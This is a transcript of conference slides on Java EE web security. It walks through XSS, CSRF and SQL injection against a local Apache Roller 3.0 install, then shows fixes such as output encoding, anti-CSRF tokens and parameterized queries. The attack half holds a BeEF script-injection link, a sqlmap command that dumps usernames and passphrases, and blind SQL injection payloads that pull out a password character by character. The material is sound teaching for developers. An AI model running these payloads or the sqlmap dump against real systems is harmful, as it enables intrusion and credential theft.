Java EE Web Security By Example: Frank Kim

Post on 06-May-2015

1.622 views 1 download



Learn how to exploit security vulnerabilities that are commonly found in the arsenal of malicious attackers. We won't simply talk about issues like XSS, CSRF and SQL Injection, but will have live demos showing how hackers exploit these potentially devastating defects using freely available tools. You'll see how to hack a real world open source application and explore bugs in commonly used open source frameworks. We also look at the source code and see how to fix these issues using secure coding principles. We will also discuss best practices that can be used to build security into your SDLC. Java developers and architects will learn how to find and fix security issues in their applications before hackers do.

Transcript of Java EE Web Security By Example: Frank Kim

Java EE Web Security By Example

JAX 2012

•  Frank Kim – Consultant, ThinkSec – Author, SANS Secure Coding in Java/JEE – SANS Application Security Curriculum Lead

What You Should Know

• Hacking is not hard • Don’t trust any data

– Assume that your users are evil!

•  Web App Attack Refresher – XSS, CSRF, SQL Injection

•  Testing – Hacking an open source app

•  Secure Coding – Fixing security bugs

Cross-Site Scripting (XSS)

• Occurs when unvalidated data is displayed back to the browser

• Types of XSS – Stored – Reflected – Document Object Model (DOM) based

Cross-Site Request Forgery (CSRF)

SQL Injection (SQLi)

•  Occurs when dynamic SQL queries are used – By injecting arbitrary SQL commands, attackers

can extend the meaning of the original query – Can potentially execute any SQL statement on

the database

•  Very powerful – #1 on CWE/SANS Top 25 Most Dangerous

Software Errors – #1 on OWASP Top 10

What are We Testing?

•  Installation of Roller 3.0 •  Fake install of SANS AppSec Street Fighter Blog •  Want to simulate the actions that a real attacker

might take –  There are definitely other avenues of attack –  We're walking through one attack scenario

Attack Scenario

1)  XSS to control the victim's browser 2)  Combine XSS and CSRF to conduct a

privilege escalation attack - Use escalated privileges to access another feature

3)  Use SQL Injection to access the database directly

Spot the Vuln - XSS

XSS in head.jsp

Java EE Web Security By Example 13

Testing the "look" Param

•  Admin pages include head.jsp •  The param is persistent for the session

XSS Exploitation

•  Introducing BeEF – Browser Exploitation Framework –

•  Uses XSS to hook the victim's browser – Log user keystrokes, view browsing history,

execute JavaScript, etc – Advanced attacks - Metasploit integration,

browser exploits, etc

XSS Exploitation Overview

Attacker Victim

1) Sends link with evil BeEF script

http://localhost:8080/roller/roller-ui/"><script src=""></script>

2) Victim clicks evil link

3) Victim's browser sends data to attacker


Spot the Vuln - CSRF

Java EE Web Security By Example 18

CSRF in UserAdmin.jsp

Want to use CSRF to change

this field


Spot the Vuln – SQL Injection

Java EE Web Security By Example 21

SQL Injection in UserServlet

Java EE Web Security By Example 22

SQL Injection Testing

• UserServlet is vulnerable to SQLi http://localhost:8080/roller/roller-ui/authoring/user

No results

Exploiting SQL Injection

•  Introducing sqlmap –

•  Tool that automates detection and exploitation of SQL Injection vulns –  Supports MySQL, Oracle, PostgreSQL, MS SQL Server –  Supports blind, inband, and batch queries –  Fingerprint/enumeration - dump db schemas, tables/

column names, data, db users, etc –  Takeover features - read/upload files, exec arbitrary

commands, exec Metasploit shellcode, etc

sqlmap Syntax

� Dump userids and passwords python -u "http://localhost:8080/roller/roller-ui/

authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID==<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2

SQL Injection Demo

How it Works

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy


CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy

Step By Step [0]

SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;

returns ilovethetajmahal

Step By Step [1]

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);

returns i select MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);

returns l select MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);

returns o

Step By Step [2]

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));

returns 105 select ORD(MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));

returns 108 select ORD(MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));

returns 111

Attack Summary

1)  XSS to control the victim's browser 2)  Combine XSS and CSRF to conduct a

privilege escalation attack - Use escalated privileges to access another feature

3)  Use SQL Injection to access the database directly

Should I be consuming this?

Should I be emitting this?

Data Validation

Inbound Data

Outbound Data

Data Store





Outbound Data

Inbound Data


Output Encoding

•  Encoding –  Convert characters so they are treated as data

and not special characters

•  Must escape differently depending where data is displayed on the page

•  XSS Prevention Cheat Sheet


Fix XSS in head.jsp

• Add URL encoding <link rel="stylesheet" type="text/css"

media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />

Fix CSRF in Update User Functionality

• UserAdmin.jsp – Add anti-CSRF token

<input type="hidden" name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> >

• – Check anti-CSRF token

if (!CSRFTokenUtil.isValid(req.getSession(false), req)){

return mapping.findForward("error");


Fix SQL Injection in

• Use parameterized queries correctly if (startsWith == null || startsWith.equals("")) {

query = "SELECT username, emailaddress FROM rolleruser";

stmt = con.prepareStatement(query); } else {

query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";

stmt = con.prepareStatement(query); stmt.setString(1, startsWith + "%"); stmt.setString(2, startsWith + "%"); }

rs = stmt.executeQuery();

Building Secure Software

Source: Microsoft SDL

